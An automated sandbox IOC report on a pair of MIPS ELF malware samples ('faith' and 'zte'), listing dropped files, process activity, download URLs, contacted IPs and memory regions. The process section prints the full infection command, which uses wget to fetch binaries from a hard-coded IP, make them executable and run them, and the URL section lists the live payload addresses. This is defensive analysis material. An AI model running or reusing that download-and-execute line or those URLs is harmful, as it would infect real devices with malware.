Automated Malware Analysis IOC Report for

Files

File Path

Type

Category

Malicious

/dev/test_write

data

dropped

Details

File:	/dev/test_write
Category:	dropped
Dump:	test_write.31.dr
ID:	dr_3
Target ID:	31
Process:	/tmp/zte
Type:	data
Entropy:	7.898146365833693
Encrypted:	false
Ssdeep:	48:wly78n0TXcoYtN2bDKEp37aHedWd8wL6Mf39s0Y3fSPK6Wzz2P:T78n0TMoYtqmEsGWdCMf39sPSSBo
Size:	2032
Whitelisted:	false
Reputation:	low

Signature Hits	Behavior Group	Mitre Attack
Manipulation of devices in /dev	Data Obfuscation

/tmp/faith

ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, no section header

dropped

Details

File:	/tmp/faith
Category:	dropped
Dump:	faith.12.dr
ID:	dr_0
Target ID:	12
Process:	/usr/bin/wget
Type:	ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, no section header
Entropy:	7.971760975190941
Encrypted:	false
Ssdeep:	1536:ZLAC/jpWMsTR732Om4H7JPoTFYWGO8qmAd9kJik+KOZJP5NLXFc:ZlsMsT8fhR8qmAd9ywKOZR596
Size:	69440
Whitelisted:	false
Reputation:	low

Signature Hits	Behavior Group	Mitre Attack
Antivirus detection for dropped file	AV Detection
Sample deletes itself	Hooking and other Techniques for Hiding and Protection	File Deletion
Sample tries to set the executable flag	Persistence and Installation Behavior	File and Directory Permissions Modification
Writes ELF files to disk	Persistence and Installation Behavior

/tmp/zte

ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, no section header

dropped

Details

File:	/tmp/zte
Category:	dropped
Dump:	zte.27.dr
ID:	dr_2
Target ID:	27
Process:	/usr/bin/wget
Type:	ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, no section header
Entropy:	7.971780688637147
Encrypted:	false
Ssdeep:	1536:s8EOx2fIarFNWV0rr0SmDEccC5Bx2GBffwZwpwrVKfHc:stMvV0rrDmocJb84YZQwrVm8
Size:	68124
Whitelisted:	false
Reputation:	low

Signature Hits	Behavior Group	Mitre Attack
Antivirus detection for dropped file	AV Detection
Sample deletes itself	Hooking and other Techniques for Hiding and Protection	File Deletion
Sample tries to set the executable flag	Persistence and Installation Behavior	File and Directory Permissions Modification
Writes ELF files to disk	Persistence and Installation Behavior

Processes

Path

Cmdline

Malicious

/bin/sh

/bin/sh -c "cd /tmp; wget http://65.175.140.164/images/faith;chmod 777 faith;./faith faith2;cd /tmp; wget http://65.175.140.164/images/zte;chmod 777 zte;./zte faith2;"

/bin/sh

/usr/bin/wget

wget http://65.175.140.164/images/faith

/bin/sh

/usr/bin/chmod

chmod 777 faith

/bin/sh

/tmp/faith

./faith faith2

/tmp/faith

/bin/sh

sh -c mount

/bin/sh

/usr/bin/mount

mount

/tmp/faith

/bin/sh

/usr/bin/wget

wget http://65.175.140.164/images/zte

/bin/sh

/usr/bin/chmod

chmod 777 zte

/bin/sh

/tmp/zte

./zte faith2

/tmp/zte

/bin/sh

sh -c mount

/bin/sh

/usr/bin/mount

mount

/tmp/zte

/usr/bin/dash

/usr/bin/rm

rm -f /tmp/tmp.BpCLyWqgbw /tmp/tmp.RbLMPu6BCN /tmp/tmp.C4ejyQZfEq

/usr/bin/dash

/usr/bin/rm

rm -f /tmp/tmp.BpCLyWqgbw /tmp/tmp.RbLMPu6BCN /tmp/tmp.C4ejyQZfEq

There are 17 hidden processes, click here to show them.

URLs

Name

Malicious

http://65.175.140.164/images/zte

65.175.140.164

Details

Name:	http://65.175.140.164/images/zte
IP:	65.175.140.164
TargetID:	-1
From Memory:	false
Source:	network

Signature Hits	Behavior Group	Mitre Attack
Executes the "wget" command typically used for HTTP/S downloading	Networking, Persistence and Installation Behavior	Application Layer Protocol
Connects to IPs without corresponding DNS lookups	Networking
Downloads files from webservers via HTTP	Networking	Application Layer Protocol Non-Application Layer Protocol Ingress Tool Transfer

http://65.175.140.164/images/faith

65.175.140.164

Details

Name:	http://65.175.140.164/images/faith
IP:	65.175.140.164
TargetID:	-1
From Memory:	false
Source:	network

Signature Hits	Behavior Group	Mitre Attack
Executes the "wget" command typically used for HTTP/S downloading	Networking, Persistence and Installation Behavior	Application Layer Protocol
Connects to IPs without corresponding DNS lookups	Networking
Downloads files from webservers via HTTP	Networking	Application Layer Protocol Non-Application Layer Protocol Ingress Tool Transfer

IPs

Domain

Country

Malicious

54.171.230.55

unknown

United States

Details

IP:	54.171.230.55
TargetID:	-1
Country:	United States
Countrycode:	USA
ASN number:	16509
ASN name:	AMAZON-02US
Private:	false

Signature Hits	Behavior Group	Mitre Attack
Connects to IPs without corresponding DNS lookups	Networking

65.175.140.164

unknown

United States

Details

IP:	65.175.140.164
TargetID:	-1
Country:	United States
Countrycode:	USA
ASN number:	32448
ASN name:	METROCAST-1US
Private:	false

Signature Hits	Behavior Group	Mitre Attack
Executes the "wget" command typically used for HTTP/S downloading	Networking, Persistence and Installation Behavior	Application Layer Protocol
Connects to IPs without corresponding DNS lookups	Networking
Downloads files from webservers via HTTP	Networking	Application Layer Protocol Non-Application Layer Protocol Ingress Tool Transfer

109.202.202.202

unknown

Switzerland

91.189.91.43

unknown

United Kingdom

91.189.91.42

unknown

United Kingdom

Details

IP:	91.189.91.42
TargetID:	-1
Country:	United Kingdom
Countrycode:	GBR
ASN number:	41231
ASN name:	CANONICAL-ASGB
Private:	false

Signature Hits	Behavior Group	Mitre Attack
Connects to IPs without corresponding DNS lookups	Networking

Memdumps

Base Address

Regiontype

Protect

Malicious

55b0d83ab000

page execute and read and write

7f77ba6a7000

page read and write

7fd1a8486000

page read and write

7fd230465000

page read and write

55bbedd11000

page read and write

7fd2300f4000

page read and write

7f77ba6a7000

page read and write

7f77b9800000

page read and write

7fd230777000

page read and write

7fd228021000

page read and write

7f7734486000

page read and write

7fd228021000

page read and write

7fd1a8439000

page execute read

7fd22fd53000

page read and write

7ffd4bdd1000

page execute read

55bbea29c000

page execute read

7fd22fd53000

page read and write

7f77ba667000

page read and write

7ffdd29e6000

page execute read

7ffdd29e6000

page execute read

7fd1a8486000

page read and write

7ffd4bd8b000

page read and write

55bbea52e000

page read and write

7f77ba9d8000

page read and write

7f77b4000000

page read and write

7f7734439000

page execute read

7f77b4021000

page read and write

7f77ba2c6000

page read and write

7f7734486000

page read and write

7fd230646000

page read and write

7f77ba68a000

page read and write

7f77bace2000

page read and write

55bbea524000

page read and write

55b0d611b000

page execute read

7f77b4021000

page read and write

7f77bacea000

page read and write

7fd1a8488000

page read and write

7f77ba008000

page read and write

7f77bace2000

page read and write

7f77babb9000

page read and write

7fd230134000

page read and write

55b0d63ad000

page read and write

7f77b4000000

page read and write

7f77babb9000

page read and write

55b0d63a3000

page read and write

7fd22faa3000

page read and write

7ffd4bd8b000

page read and write

7f77ba016000

page read and write

7fd22f28d000

page read and write

55bbea29c000

page execute read

7fd22fa95000

page read and write

55b0d63a3000

page read and write

7fd230117000

page read and write

7f7734488000

page read and write

7fd230117000

page read and write

7fd1a8439000

page execute read

55b0d63ad000

page read and write

55bbea524000

page read and write

7ffd4bdd1000

page execute read

7fd22faa3000

page read and write

7fd2300f4000

page read and write

7fd22fa95000

page read and write

7fd23076f000

page read and write

7f77bad2f000

page read and write

7f77ba016000

page read and write

55b0d83ab000

page execute and read and write

55b0d611b000

page execute read

7fd230465000

page read and write

7fd230646000

page read and write

7fd22f28d000

page read and write

7f77bacea000

page read and write

7ffdd2984000

page read and write

55b0d83c2000

page read and write

7f7734439000

page execute read

55bbec543000

page read and write

7fd23076f000

page read and write

7f77ba68a000

page read and write

55bbedd11000

page read and write

55bbec543000

page read and write

7f77ba667000

page read and write

55b0d868b000

page read and write

7f77ba2c6000

page read and write

55b0d868b000

page read and write

7f77b9800000

page read and write

7f77bad2f000

page read and write

7fd228000000

page read and write

7fd2307bc000

page read and write

7fd228000000

page read and write

7f77ba9d8000

page read and write

55bbec52c000

page execute and read and write

7ffdd2984000

page read and write

7fd2307bc000

page read and write

7fd230134000

page read and write

7fd230777000

page read and write

7f77ba008000

page read and write

55bbec52c000

page execute and read and write

55bbea52e000

page read and write

55b0d83c2000

page read and write

There are 88 hidden memdumps, click here to show them.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC Report

Files

Processes

URLs

IPs

Memdumps